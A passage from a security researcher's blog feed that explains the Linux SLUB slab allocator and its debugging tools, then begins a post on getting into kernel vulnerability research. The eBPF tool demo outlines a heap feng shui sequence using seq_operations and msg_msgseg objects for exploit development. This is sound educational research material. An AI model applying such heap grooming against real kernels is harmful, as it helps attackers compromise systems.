<p>This tells us the size of the objects in each <code>kmem_cache</code>, e.g. the <code>kmem_cache</code> for 256 byte objects will be at <code>index</code> 8.</p>
<p>Note that a <code>kmalloc()</code> allocation will use the smallest <code>kmem_cache</code> object size it can fit into. E.g. a 257 byte allocation won&rsquo;t fit into the 256 byte objects, so it will allocate from the next cache after, which is 512 byte objects.</p>
<p><img src="https://sam4k.com/content/images/2022/11/if_that-makes_sense.gif" alt=""></p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">kfree</span><span class="p">(</span><span class="k">const</span> <span class="kt">void</span> <span class="o">*</span><span class="n">objp</span><span class="p">)</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L188">/include/linux/slab.h</a></p>
<p>Before you go throwing <code>kmalloc()</code>&rsquo;s left and right, don&rsquo;t forget <code>kfree()</code>! This is of course the ubiquitous function for freeing memory allocated via the slab allocator.</p>
<p>Calling this function on an object allocated via the slab allocator will free that object. If this slab was in the <code>full</code> list, it becomes <code>partial</code> and if this is the last object then the slab may get released altogether.</p>
<h4 id="kmemcachecreate">kmem_cache_create</h4>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">kmem_cache</span> <span class="o">*</span><span class="nf">kmem_cache_create</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">name</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">size</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">align</span><span class="p">,</span> <span class="kt">slab_flags_t</span> <span class="n">flags</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">			<span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">ctor</span><span class="p">)(</span><span class="kt">void</span> <span class="o">*</span><span class="p">));</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L150">/include/linux/slab.h</a></p>
<p>So we&rsquo;ve covered the fundamentals: allocating and freeing via the slab allocator. <code>kmem_cache_create()</code> allows kernel developers to create their own <code>kmem_cache</code> within the slab allocator - pretty neat, right?</p>
<p>Creating a special-purpose cache can be advantageous, especially for objects which are allocated often (like <code>struct task_struct</code>):</p>
<ul>
<li>We can reduce internal fragmentation by specifying the object size to suit our needs, as the general purpose caches have fixed object sizes which may not be optimal</li>
<li><code>ctor()</code> allows us to optimise initialisation of our objects if values are being reused</li>
<li>There&rsquo;s also debugging, security and other benefits to this but you get the gist!</li>
</ul>
<p>We can actually use Elixr to <a href="https://elixir.bootlin.com/linux/v6.0.6/A/ident/kmem_cache_create">see all the references</a> to <code>kmem_cache_create()</code> in the kernel to see who&rsquo;s making use of this too!</p>
<h4 id="kmemcachealloc">kmem_cache_alloc</h4>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">void</span> <span class="o">*</span><span class="nf">kmem_cache_alloc</span><span class="p">(</span><span class="k">struct</span> <span class="n">kmem_cache</span> <span class="o">*</span><span class="n">s</span><span class="p">,</span> <span class="kt">gfp_t</span> <span class="n">flags</span><span class="p">)</span> <span class="n">__assume_slab_alignment</span> <span class="n">__malloc</span><span class="p">;</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L435">/include/linux/slab.h</a></p>
<p>Once we&rsquo;ve created a <code>kmem_cache</code>, we can use <code>kmem_cache_alloc()</code> to allocate an object directly from that cache. You&rsquo;ll notice here we don&rsquo;t supply a <code>size</code>, as caches have fixed sized objects and we&rsquo;re specifying directly the cache we want to allocate from!</p>
<h4 id="cache-aliases">cache aliases</h4>
<p>Something I haven&rsquo;t mentioned up until now, is the concept of SLUB aliasing.</p>
<p>To reduce fragmentation, the kernel may &ldquo;merge&rdquo; caches with similar properties (alignment, size, flags etc.). <code>find_mergeable()</code> implements this meragability check:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">struct</span> <span class="n">kmem_cache</span> <span class="o">*</span><span class="nf">find_mergeable</span><span class="p">(</span><span class="kt">unsigned</span> <span class="n">size</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="n">align</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="kt">slab_flags_t</span> <span class="n">flags</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">name</span><span class="p">,</span> <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">ctor</span><span class="p">)(</span><span class="kt">void</span> <span class="o">*</span><span class="p">));</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L291">/include/linux/slab.h</a></p>
<p>A special-purpose cache may get merged/aliased with one of the general-purpose caches we touched on earlier, so allocations via <code>kmem_cache_alloc()</code> for a merged cache will actually come from the respective general-purpose cache.</p>
<hr>
<ol>
<li><a href="https://man7.org/linux/man-pages/man3/errno.3.html">https://man7.org/linux/man-pages/man3/errno.3.html</a></li>
</ol>
<h3 id="seeing-it-in-action">Seeing It In Action</h3>
<p><img src="https://sam4k.com/content/images/2022/11/roll_up_my_sleeves.gif" alt=""></p>
<p>This is where things get fun! In this section we&rsquo;re gonna take what we&rsquo;ve learned throughout this post and double check I haven&rsquo;t been making it all up :D</p>
<h4 id="procslabinfo">/proc/slabinfo</h4>
<p>Our good ol&rsquo; friend <code>[procfs](https://man7.org/linux/man-pages/man5/proc.5.html)</code> is coming in strong again, by providing us <code>[/proc/slabinfo](https://man7.org/linux/man-pages/man5/slabinfo.5.html)</code>, providing kernel slab allocator statistics to privileged users.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">$ sudo cat /proc/slabinfo
</span></span><span class="line"><span class="cl">slabinfo - version: 2.1
</span></span><span class="line"><span class="cl"># name            &lt;active_objs&gt; &lt;num_objs&gt; &lt;objsize&gt; &lt;objperslab&gt; &lt;pagesperslab&gt; : tunables &lt;limit&gt; &lt;batchcount&gt; &lt;sharedfactor&gt; : slabdata &lt;active_slabs&gt; &lt;num_slabs&gt; &lt;sharedavail&gt;
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">task_struct         1480   1539   8384    3    8 : tunables    0    0    0 : slabdata    513    513      0
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">dma-kmalloc-512        0      0    512   32    4 : tunables    0    0    0 : slabdata      0      0      0
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">kmalloc-cg-512      1169   1312    512   32    4 : tunables    0    0    0 : slabdata     41     41      0
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">kmalloc-512        40878  43360    512   32    4 : tunables    0    0    0 : slabdata   1355   1355      0
</span></span><span class="line"><span class="cl">kmalloc-256        21850  21856    256   32    2 : tunables    0    0    0 : slabdata    683    683      0
</span></span><span class="line"><span class="cl">kmalloc-192        35987  37002    192   21    1 : tunables    0    0    0 : slabdata   1762   1762      0
</span></span><span class="line"><span class="cl">kmalloc-128         4555   5440    128   32    1 : tunables    0    0    0 : slabdata    170    170      0
</span></span></code></pre></div><p>snippet from <code>$ sudo cat /proc/slabinfo</code></p>
<p>This provides some useful information on the various caches on the system. From the snippet above we can see some of the stuff we touched on in the API section!</p>
<p>We can see a private cache, used for <code>struct task_struct</code> named <code>task_struct</code>. Additionally we can see several general purposes caches, of various kmalloc types ( <code>KMALLOC_DMA</code>, <code>KMALLOC_CGROUP</code> and <code>KMALLOC_NORMAL</code> respectively) and sizes.</p>
<h4 id="slabtop">slabtop</h4>
<p><code>[slabtop](https://man7.org/linux/man-pages/man1/slabtop.1.html)</code> is a neat little tool, and part of the /proc filesystem utilities project, which takes the introspection a step further by providing realtime slab cache information!</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> Active / Total Objects (% used)    : 3479009 / 3524760 (98.7%)
</span></span><span class="line"><span class="cl"> Active / Total Slabs (% used)      : 100682 / 100682 (100.0%)
</span></span><span class="line"><span class="cl"> Active / Total Caches (% used)     : 130 / 181 (71.8%)
</span></span><span class="line"><span class="cl"> Active / Total Size (% used)       : 923525.41K / 936501.10K (98.6%)
</span></span><span class="line"><span class="cl"> Minimum / Average / Maximum Object : 0.01K / 0.27K / 295.07K
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">  OBJS ACTIVE  USE OBJ SIZE  SLABS OBJ/SLAB CACHE SIZE NAME                   
</span></span><span class="line"><span class="cl"> 766116 766116 100%    0.10K  19644       39     78576K buffer_head
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl"> 43328  40468  93%    0.50K   1354       32     21664K kmalloc-512
</span></span><span class="line"><span class="cl"> 36981  35834  96%    0.19K   1761       21      7044K kmalloc-192
</span></span></code></pre></div><p>snippet from <code>$ sudo slabtop</code></p>
<h4 id="slabinfo">slabinfo</h4>
<p>Perhaps confusingly, there is also a tool named <code>slabinfo</code> which is provided with the kernel source in <code>tools/vm/slabinfo.c</code> (calling <code>make</code> in <code>tools/vm</code> is all you need to do build this and get stuck in).</p>
<p>To further the confusion, instead of <code>/proc/slabinfo</code>, <code>slabinfo</code> uses <code>/sys/kernel/slab/</code><a href="https://www.kernel.org/doc/Documentation/ABI/testing/sysfs-kernel-slab">[1]</a> as it&rsquo;s source of information. It contains a snapshot of the internal state of the slab allocator which can be processed by <code>slabinfo</code>.</p>
<p>Further to our section on cache aliases earlier, we can use <code>slabinfo -a</code> to see a list of all the current cache aliases on our system!</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">$ ./slabinfo -a
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">:0000256     &lt;- key_jar 
</span></span></code></pre></div><p>Here we can see the <code>kmem_cache</code> with name <code>&quot;key_jar&quot;</code> is aliased with <code>kmalloc-256</code>.</p>
<h4 id="debugging">debugging</h4>
<p><img src="https://sam4k.com/content/images/2022/11/headband_prepare.gif" alt=""></p>
<p>Sometime&rsquo;s you just can&rsquo;t beat getting stuck into some good ol&rsquo; kernel debugging. I&rsquo;ve covered previously how to get this setup<a href="https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/">[2]</a>, it&rsquo;s fairly quick to get kernel debugging via <code>gdb</code> up and running on a QEMU/VMWare guest I promise!</p>
<p>After that we can explore to our heart&rsquo;s content. We can unravel the exported list <code>slab_caches</code> directly, or perhaps break on a call to <code>kmalloc()</code> and see what hits first.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">gef➤  b __kmalloc
</span></span><span class="line"><span class="cl">Breakpoint 2 at 0xffffffff81347240: file mm/slub.c, line 4391.
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">──────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
</span></span><span class="line"><span class="cl">[#0] 0xffffffff81347240 → __kmalloc(size=0x108, flags=0xdc0)
</span></span><span class="line"><span class="cl">[#1] 0xffffffff81c4911c → kmalloc(flags=0xdc0, size=0x108)
</span></span><span class="line"><span class="cl">[#2] 0xffffffff81c4911c → kzalloc(flags=0xcc0, size=0x108)
</span></span><span class="line"><span class="cl">[#3] 0xffffffff81c4911c → fib6_info_alloc(gfp_flags=0xcc0, with_fib6_nh=0x1)
</span></span><span class="line"><span class="cl">[#4] 0xffffffff81c44186 → ip6_route_info_create(cfg=0xffffc900007a7a58, gfp_flags=0xcc0, extack=0xffffc900007a7bb0)
</span></span></code></pre></div><p>Given I&rsquo;m ssh&rsquo;d into my guest, probably unsurprising there&rsquo;s network stuff kicking about. Look like someone&rsquo;s requested a 0x108 byte object, and as we&rsquo;re going through <code>kmalloc()</code> this should end up in one of the general purpose caches.</p>
<p>0x108 is 264 bytes, so that&rsquo;s just too big for the <code>kmalloc-256</code> cache, so we should expect an allocation from on of the 512 byte general purpose caches, right? Let&rsquo;s find out!</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="kt">void</span> <span class="o">*</span><span class="nf">__kmalloc</span><span class="p">(</span><span class="kt">size_t</span> <span class="n">size</span><span class="p">,</span> <span class="kt">gfp_t</span> <span class="n">flags</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">kmem_cache</span> <span class="o">*</span><span class="n">s</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">...</span>
</span></span><span class="line"><span class="cl">	<span class="n">s</span> <span class="o">=</span> <span class="nf">kmalloc_slab</span><span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">flags</span><span class="p">);</span>
</span></span></code></pre></div><p>Looking at the source, we can see the call to <code>kmalloc_slab()</code> will return our cache.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">gef➤  disas 
</span></span><span class="line"><span class="cl">Dump of assembler code for function __kmalloc:
</span></span><span class="line"><span class="cl">=&gt; 0xffffffff81347240 &lt;+0&gt;:     nop    DWORD PTR [rax+rax*1+0x0]
</span></span><span class="line"><span class="cl">   0xffffffff81347245 &lt;+5&gt;:     push   rbp
</span></span><span class="line"><span class="cl">   0xffffffff81347246 &lt;+6&gt;:     mov    rbp,rsp
</span></span><span class="line"><span class="cl">   0xffffffff81347249 &lt;+9&gt;:     push   r15
</span></span><span class="line"><span class="cl">   0xffffffff8134724b &lt;+11&gt;:    push   r14
</span></span><span class="line"><span class="cl">   0xffffffff8134724d &lt;+13&gt;:    mov    r14d,esi
</span></span><span class="line"><span class="cl">   0xffffffff81347250 &lt;+16&gt;:    push   r13
</span></span><span class="line"><span class="cl">   0xffffffff81347252 &lt;+18&gt;:    push   r12
</span></span><span class="line"><span class="cl">   0xffffffff81347254 &lt;+20&gt;:    push   rbx
</span></span><span class="line"><span class="cl">   0xffffffff81347255 &lt;+21&gt;:    sub    rsp,0x18
</span></span><span class="line"><span class="cl">   0xffffffff81347259 &lt;+25&gt;:    mov    QWORD PTR [rbp-0x40],rdi
</span></span><span class="line"><span class="cl">   0xffffffff8134725d &lt;+29&gt;:    mov    rax,QWORD PTR gs:0x28
</span></span><span class="line"><span class="cl">   0xffffffff81347266 &lt;+38&gt;:    mov    QWORD PTR [rbp-0x30],rax
</span></span><span class="line"><span class="cl">   0xffffffff8134726a &lt;+42&gt;:    xor    eax,eax
</span></span><span class="line"><span class="cl">   0xffffffff8134726c &lt;+44&gt;:    cmp    rdi,0x2000
</span></span><span class="line"><span class="cl">   0xffffffff81347273 &lt;+51&gt;:    ja     0xffffffff813474d8 &lt;__kmalloc+664&gt;
</span></span><span class="line"><span class="cl">   0xffffffff81347279 &lt;+57&gt;:    mov    rdi,QWORD PTR [rbp-0x40]
</span></span><span class="line"><span class="cl">   0xffffffff8134727d &lt;+61&gt;:    call   0xffffffff812dbe70 &lt;kmalloc_slab&gt;
</span></span><span class="line"><span class="cl">   0xffffffff81347282 &lt;+66&gt;:    mov    r12,rax
</span></span><span class="line"><span class="cl">   ...
</span></span></code></pre></div><p>Okay, nice, we can see the call to <code>kmalloc_slab()</code> on line 20, so we just need to check the return value after that <code>call</code> :) Cos we&rsquo;re on <code>x86_64</code> we know it&rsquo;ll be in <code>$RAX</code>.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">───────────────────────────────────────────────────────────────────────────── registers ────
</span></span><span class="line"><span class="cl">$rax   : 0xffff888100041a00  →  0x0000000000035140  →  0x0000000000035140
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">─────────────────────────────────────────────────────────────────────────── code:x86:64 ────
</span></span><span class="line"><span class="cl">   0xffffffff81347273 &lt;__kmalloc+51&gt;   ja     0xffffffff813474d8 &lt;__kmalloc+664&gt;
</span></span><span class="line"><span class="cl">   0xffffffff81347279 &lt;__kmalloc+57&gt;   mov    rdi, QWORD PTR [rbp-0x40]
</span></span><span class="line"><span class="cl">   0xffffffff8134727d &lt;__kmalloc+61&gt;   call   0xffffffff812dbe70 &lt;kmalloc_slab&gt;
</span></span><span class="line"><span class="cl"> → 0xffffffff81347282 &lt;__kmalloc+66&gt;   mov    r12, rax
</span></span><span class="line"><span class="cl">...
</span></span><span class="line"><span class="cl">───────────────────────────────────────────────────────────────────────────────── trace ────
</span></span><span class="line"><span class="cl">[#0] 0xffffffff81347282 → __kmalloc(size=0x108, flags=0xdc0)
</span></span><span class="line"><span class="cl">────────────────────────────────────────────────────────────────────────────────────────────
</span></span><span class="line"><span class="cl">gef➤  p *(struct kmem_cache*)$rax
</span></span><span class="line"><span class="cl">$6 = {
</span></span><span class="line"><span class="cl">  ...
</span></span><span class="line"><span class="cl">  size = 0x200,
</span></span><span class="line"><span class="cl">  object_size = 0x200,
</span></span><span class="line"><span class="cl">  ...
</span></span><span class="line"><span class="cl">  ctor = 0x0 &lt;fixed_percpu_data&gt;,
</span></span><span class="line"><span class="cl">  inuse = 0x200,
</span></span><span class="line"><span class="cl">  ...
</span></span><span class="line"><span class="cl">  name = 0xffffffff8297cb4c &#34;kmalloc-512&#34;,
</span></span></code></pre></div><p>And voila! We cast the value returned by <code>kmalloc_slab()</code> as a <code>kmem_cache</code> and just like that we can view the members. We can see the name is indeed <code>kmalloc-512</code> as we hypothesised and we can also see some of the other fields we touched on :)</p>
<p>Anyway, hopefully that was a fun little demo on how you can reinforce your understanding with a little exploration in the debugger.</p>
<p>I also wanted to highlight <code>[drgn](https://github.com/osandov/drgn)</code> as another debugger to tinker with, which lets you do live introspection &amp; debugging on your kernel. It&rsquo;s written in python and is very programmable, however I couldn&rsquo;t get it to find some symbols for this particular demo.</p>
<h4 id="slxbtrace-ebpf">slxbtrace (ebpf)</h4>
<p><img src="https://sam4k.com/content/images/2022/11/exited_dance.gif" alt=""></p>
<p>Now for the grand reveal, the real reason behind this 5,000 word (yikes) post &hellip; a cool little tool I&rsquo;ve been working on for visualising slub allocations :D</p>
<p>Well, this could very well already be a thing, but I&rsquo;d been sleeping on ebpf for far too long and this seemed like a fun way to explore the tooling.</p>
<p>Without going too much into the ebpf implementation (another post, maybe?!), <code>slxbtrace</code>[3] lets you specify a specific cache size and visualise the cache state. In particular you can highlight allocations from particular call sites, making it a neat tool for helping with heap feng shui during exploit development.</p>
<p><img src="https://sam4k.com/content/images/2022/11/slxbtrace_demo.gif" alt=""></p>
<p>pls excuse the flickering&hellip; my fault for using linux</p>
<p>Let me explain what on earth is going on here. So, <code>slxbtrace</code> will basically hook and process calls to <code>kmalloc()</code> and <code>kfree()</code> and show you what&rsquo;s where in a cache.</p>
<p>So far it&rsquo;s pretty naive, when you run it, it has no knowledge of the cache state. However, once it starts catching <code>kmalloc()</code>&rsquo;s it can build up an idea of where the slabs are (as they&rsquo;re page aligned) and the objects in it.</p>
<p>Each known slab is visualised. We can see the slab address on the left, and then the objects in the slab as they&rsquo;d sit in memory:</p>
<ul>
<li><code>?</code> means <code>slxbtrace</code> doesn&rsquo;t know the state of this object</li>
<li><code>-</code> represents a free object</li>
<li><code>x</code> represents a misc allocations</li>
<li><code>0...</code> we can then tag specific allocations so they&rsquo;re easy to visualise</li>
</ul>
<p>So what&rsquo;s going on in this demo?! Well I am tracking the state of the <code>kmalloc-cg-32</code> cache with <code>slxbtrace</code> on the left, while I run a program will triggers a bunch of kmallocations on the right (<code>kmalloc32-fengshui</code>). This program:</p>
<ol>
<li>Triggers 800 allocations of <code>struct seq_operations</code>, whose allocations are tracked as <code>|0|</code>, to fill up some slabs!</li>
<li>Free&rsquo;s every other <code>struct seq_operations</code> after the first 400, effectively trying to make some holes (denoted by <code>|-|</code>) in the slabs we just filled up</li>
<li>Next I allocate a bunch of <code>struct msg_msgseg</code>s of the same size (denoted by <code>|1|</code>), trying to land them next to my <code>struct seq_operations</code> in memeory :D</li>
<li>Finally I cleanup everything and free it all :)</li>
</ol>
<p>Right now this is just a very, very barebones poc and likely has some issues, but I thought it would be neat to share here as it demonstrates some of the stuff we&rsquo;ve touched on.</p>
<p>I will absolutely share all this on my github though, once it&rsquo;s in a shareable state, just in case anyone else is also interesting in playing around!</p>
<hr>
<ol>
<li><a href="https://www.kernel.org/doc/Documentation/ABI/testing/sysfs-kernel-slab">https://www.kernel.org/doc/Documentation/ABI/testing/sysfs-kernel-slab</a></li>
<li><a href="https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/#debugging">https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/#debugging</a></li>
<li>not the final name, probably</li>
</ol>
<h3 id="wrapping-up">Wrapping Up</h3>
<p><img src="https://sam4k.com/content/images/2022/11/we_survived.gif" alt=""></p>
<p>Is this&hellip; did we&hellip; is it over? This one really turned into an absolute leviathan, but perhaps that&rsquo;s just a testament to work that behind the kernel&rsquo;s slab allocator!</p>
<p>In this post we covered an integral part to the kernels memory management subsystem: the slab allocator. Specifically, we looked at the SLUB implementation which is the de factor implementation on modern systems (bar embedded stuff).</p>
<p>We really lived up to the Linux internals namesake in this post, as we dived in and explored the SLUB allocator from all angles: the underpinning data structures, the API used by the rest of the kernel and then validated this all with some introspection.</p>
<p>Hopefully this provided a reasonably holistic insight into slab allocators, with opportunities for further reading/exploration readily available.</p>
<p>Also worth noting we kept things pretty shiny as we looked primarily at the latest (at the time of starting) kernel release, v6.0.6!</p>
<p>I was going to expand a bit on SLAB and SLOB, but to be honest we&rsquo;re almost at 6000 words and it&rsquo;s probably out of scope for my aims for this series, but just in case:</p>
<ul>
<li>SLAB (non-default since 14 years) was the prev default implementation and the tl;dr is it was more complex than SLUB and less friendly to modern multi-core systems <a href="https://www.kernel.org/doc/gorman/html/understand/understand011.html">[1]</a></li>
<li>SLOB was introduced ~2005 and aimed at embedded devices, trying to think things compact as possible to make the most of less memory <a href="https://lwn.net/Articles/157944/">[2]</a></li>
</ul>
<hr>
<ol>
<li><a href="https://www.kernel.org/doc/gorman/html/understand/understand011.html">https://www.kernel.org/doc/gorman/html/understand/understand011.html</a></li>
<li><a href="https://lwn.net/Articles/157944/">https://lwn.net/Articles/157944/</a></li>
</ol>
<h2 id="next-time">Next Time!</h2>
<p><img src="https://sam4k.com/content/images/2022/11/still_here.gif" alt=""></p>
<p>Well, to be honest, as far as &ldquo;<strong>Memory Allocators&rdquo;</strong> goes as a topic, we&rsquo;ve done pretty well between our coverage on the buddy and slab allocators.</p>
<p>I&rsquo;m not entirely sure there will be a next time for this mini series, I might hop back onto the virtual memory stuff and look into the lower level implementation there.</p>
<p>That said, if I were to explore the memory allocator space more I&rsquo;d want to cover the security side of things: memory allocators in the context of exploit techniques and mitigations. If that&rsquo;s something you&rsquo;d be into, feel free to let me know :)</p>
<p>Otherwise: thanks for reading, and as always feel free to <a href="https://twitter.com/sam4k1">@me</a> if you have any questions, suggestions or corrections :)</p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>So You Wanna Pwn The Kernel?</title><description>My aim for this post is to provide some insights for getting into Linux kernel vulnerability research and exploit development</description><link>https://sam4k.com/so-you-wanna-pwn-the-kernel/</link><guid isPermaLink="false">6308337592020209c38fb0fa</guid><category>linux</category><category>kernel</category><category>xdev</category><dc:creator>sam4k</dc:creator><pubDate>Thu, 01 Sep 2022 14:07:40 +0000</pubDate><media:content url="https://sam4k.com/content/images/2022/08/confused_girl.gif" medium="image"/><content:encoded><![CDATA[<p>Initially I was going to write the next instalment of the Linternals: Virtual Memory series after getting back from <a href="https://conference.hitb.org/hitbsecconf2022sin/">HITB2022SIN</a>, but after a number of offline and online conversations it seems like this could help a number of you out, so let&rsquo;s give it a go!</p>
<p>My aim for this post is to provide some insights into getting into Linux kernel <strong>v</strong>ulnerability <strong>r</strong>esearch and <strong>e</strong>xploit <strong>d</strong>evelopment (VRED), although I&rsquo;m sure some of this will be transferable to similar areas.[1]</p>
<p>Sounds fairly straightforward, right? Well, much like the process of writing a kernel exploit, diving into this can also open-ended and confusing. There are many approaches and a wealth of resources out there, with no clearly defined path to follow.</p>
<p>Is this post going to pave that clearly defined path? Probably not. We all learn in different ways, have different experiences, motivations and goals. Hopefully, however, I can help demystify this topic a bit for you and give you the tools necessary to pave the right path for you.</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#overview">Overview</a></li>
<li><a href="#mindset">Mindset</a>
<ul>
<li><a href="#motivation">Motivation</a></li>
<li><a href="#curiosity">Curiosity</a></li>
<li><a href="#perseverance">Perseverance</a></li>
<li><a href="#ego">Ego</a></li>
</ul>
</li>
<li><a href="#approaches">Approaches</a>
<ul>
<li><a href="#reading">Reading</a></li>
<li><a href="#videos">Videos</a></li>
<li><a href="#projects">Projects</a></li>
</ul>
</li>
<li><a href="#workflow">Workflow</a>
<ul>
<li><a href="#tooling">Tooling</a></li>
<li><a href="#organisation">Organisation</a></li>
<li><a href="#staying-up-to-date">Staying Up-To-Date</a></li>
<li><a href="#having-a-gameplan">Having a Gameplan</a></li>
</ul>
</li>
<li><a href="#resources">Resources</a>
<ul>
<li><a href="#ctfs">CTFs</a></li>
<li><a href="#reading-materials">Reading Materials</a></li>
<li><a href="#tools">Tools</a></li>
<li><a href="#video-materials">Video Materials</a></li>
</ul>
</li>
<li><a href="#wrapping-up">Wrapping Up</a></li>
</ul>
<hr>
<ol>
<li>For a more general post on demystifying security research, I absolutely recommend a post of the same title by <a href="https://twitter.com/alexjplaskett">Alex Plaskett</a> <a href="https://alexplaskett.github.io/demystifying-security-research-part1/">here</a>, which touches on similar themes</li>
</ol>
<h2 id="overview">Overview</h2>
<p>As I mentioned above, linux vred is a complex and constantly evolving topic. So as you might imagine, trying to write an accessible, usable introduction to this topic has it&rsquo;s own challenges. But we gotta try!</p>
<p>The first thing I want to cover is <strong>mindset</strong>. Yeah, I get it, sounds wishy-washy and inactionable, but I think it will help to talk a bit about some useful mindset tips for approaching work like this and avoiding burnout.</p>
<p>Then I&rsquo;ll move onto talking about <strong>approaches</strong> you can take to begin your journey down the rabbit hole that is linux vred and hone your skills. Again, worth highlighting here that these are just suggestions from my experiences and are non-exhaustive.</p>
<p>I&rsquo;ll briefly touch on my <strong>workflow</strong> and some of the tooling I find useful, again this is really personal preference, but may be helpful as a starting point. Plus I always find it interesting to hear what cool tools and workflows other people use!</p>
<p>Finally I&rsquo;ll wrap things up with a list of <strong>resources</strong>, this will be far from exhaustive as well, but hopefully I&rsquo;ll get a decent amount of stuff in there!</p>
<p><img src="https://sam4k.com/content/images/2022/08/we_got_this.gif" alt=""></p>
<h2 id="mindset">Mindset</h2>
<h3 id="motivation">Motivation</h3>
<p>At risk of sounding like one of those YouTube motivational speakers, one of the first things you want to understand is your motivation for getting into this.</p>
<p>💡</p>
<p>Do you love understanding things and then breaking them? Do you use Linux daily and finally want to get back at it? Do you want to pivot from exploiting a different platform? Did you watch the movie Blackhat (2015)? Do you want a new hobby to keep you up till 4am?</p>
<p>Whatever your motivation, it&rsquo;s important to go into this with the understanding that this is a long journey, you (probably) won&rsquo;t be pwning kernels overnight! In fact, you&rsquo;ll never understand everything. There will be many &ldquo;failures&rdquo; and hurdles along the way.</p>
<p>But that&rsquo;s okay! Actually, it&rsquo;s more than okay, that means you&rsquo;re (probably) doing it right! Though, I&rsquo;d be lying if I said this cycle of learning and &ldquo;failure&rdquo; with the occasional success wasn&rsquo;t a magnet for burnout and motivational humps.</p>
<p>However, by understanding your motivations and goals, as well as what you&rsquo;re getting into, these motivational humps can be more manageable and infrequent.</p>
<p>In terms of managing these humps, try where possible to prioritise working on things you enjoy and are interested in. Not only will it be better for your mental health, but you&rsquo;ll also likely find yourself more productive.</p>
<p>Due to the open-ended and exploratory nature of vred, you&rsquo;re not gonna have a good time trying to innovate and seek out solutions if you&rsquo;re completely unmotivated to do so. For the same reason, having some structure and milestones associated with tasks also helps prevent feelings of aimless drifting or getting overwhelmed.</p>
<p>Like I said though, these humps aren&rsquo;t always avoidable and are managed differently by different people, so I won&rsquo;t pretend to know the answers. For example, a common recommendation, and one I use, is to remember to context switch!</p>
<p>If you&rsquo;ve been bashing your head against the keyboard for some months, neck-deep in C source code trying to find a particular primitive, sometimes it can help to take a pause. Go write that Python tool you&rsquo;ve been meaning to. No, you won&rsquo;t forget everything. In fact, you may come back with a fresh perspective and clear mind.</p>
<h3 id="curiosity">Curiosity</h3>
<p><img src="https://sam4k.com/content/images/2022/08/piqued_interest.gif" alt=""></p>
<p>Curiosity may have killed the cat, but it&rsquo;s a security researcher&rsquo;s best friend. Especially starting out, it can be tempting to rush to popping that shell.</p>
<p>Trust me, I&rsquo;ve been guilty of it many a time. You&rsquo;re just starting out and trying a kernel CTF and you just want to get that flag to prove you can do it, right? So you Google some techniques and you copy and paste some code, tweak some stuff and keep iterating until you get it.</p>
<p>But as Emerson said, &ldquo;It&rsquo;s not the destination, it&rsquo;s the journey&rdquo;. More important than popping the shell, is understanding how you popped it. The former may be a win here, but it&rsquo;s that deeper understanding which will net you future wins.</p>
<p>Be curious! Ask questions! Take your time. If you don&rsquo;t quite understand this technique you&rsquo;ve seen, spend some time playing around with it until you do. If something isn&rsquo;t working, spend some time getting to the root cause rather than jumping straight to another approach.</p>
